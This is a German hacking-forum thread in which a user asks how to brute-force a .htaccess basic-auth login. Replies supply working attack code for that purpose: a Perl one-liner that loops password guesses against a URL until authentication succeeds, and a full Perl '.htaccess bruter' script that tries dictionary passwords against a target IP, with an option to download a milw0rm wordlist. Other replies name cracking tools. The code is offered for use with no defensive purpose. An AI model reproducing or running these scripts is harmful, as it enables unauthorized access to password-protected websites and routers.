Hey habe Mal ne frage wie kann ich einen htaccess brute forcen ?
Ich will kein UserW listen usen sondern bruten .
Vielen dank für euere hilfe .
Hey habe Mal ne frage wie kann ich einen htaccess brute forcen ?
Ich will kein UserW listen usen sondern bruten .
Vielen dank für euere hilfe .
Hier hast du ein Ansatz, wie man ein Bruteforcer in Perl schreibt.
Das verbunden mit einem HTTP Request würde dann ein .htaccess Bruteforcer ergeben.
perl -e '$_=a;print$_++,$/while(1);'
Also ich suche ein Prog oder ein script wie ich ein .htaccess brute forcen kann .
Leider kann ich kein perl deshalb suche ich hier nach einer anderen lösung .
Und nach was für eine anderen Lösung suchst du?
oldsch00l johnTheRipper ;D
oder AccessDiver aber sobald ich bruten hoere denn finde ich die chancen immer verschwinden gering ;P ausser der gute Admin 12345 schlägt wieder zu !
mfg n00j
johnTheRipper kenne ich der soll aber nicht gehen hab ich gelesen .
Fertige Scripts oder ProgrammeUnd nach was für eine anderen Lösung suchst du?
Hier hast du ein fertiges Script.
Das was fett geschrieben ist, sollte man aber noch anpassen.Code:perl -MLWP::UserAgent -e '$a=a;$u=LWP::UserAgent->new;while(1){$r=$u->head("http://username:".$a++."\@url");last,if($r->headers_as_string()!~/.*realm.*/)}$a--;print"pass=$a",$/'
hab mal auf meiner HD bissel gesucht, hier ebenfalls perl
Code:#!/usr/bin/perl =poc Simple .htaccess bruteforcer. Could be usefull to crack router logins. by Perforin virii.lu #vxnet Greetings to everyone from #vxnet and EOF =cut use HTTP::Request; use LWP::UserAgent; use LWP::Simple; use File::Temp qw(tempfile); use strict; use warnings; use diagnostics; my($ip,$user,$dic) = @ARGV; my($fh, $tmpfile) = tempfile("X" x 23, UNLINK => 1); my($useragent,$request,$zeile,$_,@data); if (@ARGV < 3) { help(); } print <<"INTRO"; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ .htaccess Bruter by Perforin virii.lu #vxnet ~[v1.0]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ INTRO if ($dic =~ m/--milw0rm/i) { print "[~] Loading milw0rm wordlist...\n"; getstore('http://milw0rm.com/mil-dic.php',$tmpfile) || die "milw0rm down?!\n"; open(DIC,"<",$tmpfile) || die "Wordlist not found or permission denied!\n"; } else { open(DIC,"<",$dic) || die "Wordlist not found or permission denied!\n"; } $useragent = LWP::UserAgent->new; $request = HTTP::Request->new(GET => 'http://' . $ip); while(<DIC>) { chomp($_); $request->authorization_basic($user, $_); @data = $useragent->request($request)->as_string; foreach $zeile (@data) { if($zeile =~ m/401 Unauthorized/i) { print "[~] Bruting...\n"; } else { print "\n[!] Got login!\n"; print "[!] " . $user . ":" . $_ . "\n"; exit; } } } print "[-] Could not be cracked!\n"; close(DIC); sub help { print <<"HELP"; ######################################## .htaccess bruter by Perforin brute.pl 192.168.1.1 admin dic.txt brute.pl 192.168.1.1 admin --milw0rm ###############[virii.lu]############### HELP exit; }
¥akuza112 Inc. © 2008
Dein Neid ist meine Anerkennung und Dein Hass ist mein Stolz.Wenn Du hinter meinem Rücken über mich redest, danke ich Dir,dass Du mich zum Mittelpunkt Deines Lebens machst
Ein Wordlist Script ist meiner Meinung nach keine bruteforce Attacke.
Hier wurde aber explizit nach einem gefragt.
Und lieber was eigenes, dann hättest du auch gemerkt das es kei Brutforce ist.
Milw0rm ist doch auch down oder irre ich ?
wenn ich richtig liege, dann wird das script von jakuza112 nicht gehen
da es doch versucht auf milw0rms wordlist zuzugreifen ?